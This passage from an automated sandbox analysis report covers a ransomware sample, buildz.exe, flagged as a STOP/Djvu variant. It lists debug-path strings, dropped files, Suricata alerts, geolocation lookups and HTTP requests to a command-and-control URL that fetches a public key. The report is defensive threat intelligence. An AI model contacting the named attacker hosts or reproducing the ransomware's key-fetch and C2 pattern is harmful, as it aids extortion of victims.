          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: buildz.exe, 00000006.00000003.2929144121.000000000393A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2930487981.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929699536.000000000393F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\umN source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\E5\ source: buildz.exe, 00000006.00000003.2935372852.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939091443.0000000003990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\3=w source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: buildz.exe, 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2942712973.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2938642063.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2819183904.000000000388C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789445333.000000000388C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: buildz.exe, 00000006.00000003.2820323781.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817512809.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829424402.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830462210.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829270688.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\O source: buildz.exe, 00000006.00000003.2829769340.0000000003863000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cation Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\.pdb\p source: buildz.exe, 00000006.00000003.2902662689.000000000385F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ate\IV source: buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943430433.000000000389D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: buildz.exe, 00000006.00000003.2789952289.000000000312C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726806827.0000000003133000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2904297909.0000000003900000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903124928.00000000038F9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903960546.00000000038FF000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864984375.00000000038FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\rer\' source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*| source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\fHl source: buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943430433.000000000389D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\achec source: buildz.exe, 00000006.00000003.2911610084.000000000316B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903790233.0000000003130000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y source: buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2943551253.000000000388D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934015295.0000000003888000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2831125784.0000000003950000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865110592.0000000003939000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864608950.0000000003938000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865849961.0000000003951000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003958000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831789553.0000000003105000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\} source: buildz.exe, 00000006.00000003.2929144121.000000000393A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929699536.000000000393F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2820323781.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817512809.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829270688.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2940468429.000000000371C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939266286.0000000003716000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2865110592.0000000003939000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2873857794.0000000003969000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864608950.0000000003938000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003968000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865849961.0000000003951000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003958000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: C:\Users\user\Desktop\buildz.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2036334 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key : 192.168.2.5:49711 -> 190.219.117.240:80
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 190.219.117.240:80 -> 192.168.2.5:49711
          Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.5:49869 -> 190.219.117.240:80
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 190.219.117.240:80 -> 192.168.2.5:49869
          Source: Malware configuration extractorURLs: http://cajgtus.com/lancer/get.php
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: CableOndaPA CableOndaPA
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 190.219.117.240:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49869 -> 190.219.117.240:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49751 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49797 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49858 -> 188.114.97.3:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: global trafficHTTP traffic detected: GET /lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: buildz.exe, 00000006.00000003.2315251418.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: buildz.exe, 00000006.00000003.2319068592.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: buildz.exe, 00000006.00000003.2321821241.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: cajgtus.com
          Source: buildz.exe, 00000006.00000002.2949799439.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2947760489.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.0000000000612000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/lancer/get.php
          Source: buildz.exe, 0000000F.00000002.3295167071.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
          Source: buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
          Source: buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truehFu
          Source: buildz.exe, 00000006.00000002.2949799439.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2947760489.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.0000000000612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/lancer/get.phpnal
          Source: buildz.exe, 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: buildz.exe, 00000006.00000003.2314409625.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: buildz.exe, 00000006.00000003.2315662610.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: buildz.exe, 00000006.00000003.2316168367.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: buildz.exe, 00000006.00000003.2317340938.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: buildz.exe, 00000006.00000003.2318264871.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: buildz.exe, 00000006.00000003.2319068592.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: buildz.exe, 00000006.00000003.2320185574.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: buildz.exe, 00000006.00000003.2321821241.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: buildz.exe, 0000000A.00000002.2344992065.0000000000747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.0000000000862000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: buildz.exe, 0000000A.00000002.2344992065.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Root
          Source: buildz.exe, 00000006.00000003.2202553707.0000000000657000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.0000000000657000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000737000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000003.2322599097.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000003.2322599097.0000000000746000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.0000000000862000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.0000000000856000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.0000000000578000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000003.2534710227.0000000000623000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: buildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json)
          Source: buildz.exe, 0000000A.00000003.2322599097.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json/
          Source: buildz.exe, 00000006.00000003.2202553707.0000000000657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2
          Source: buildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2i
          Source: buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json;P
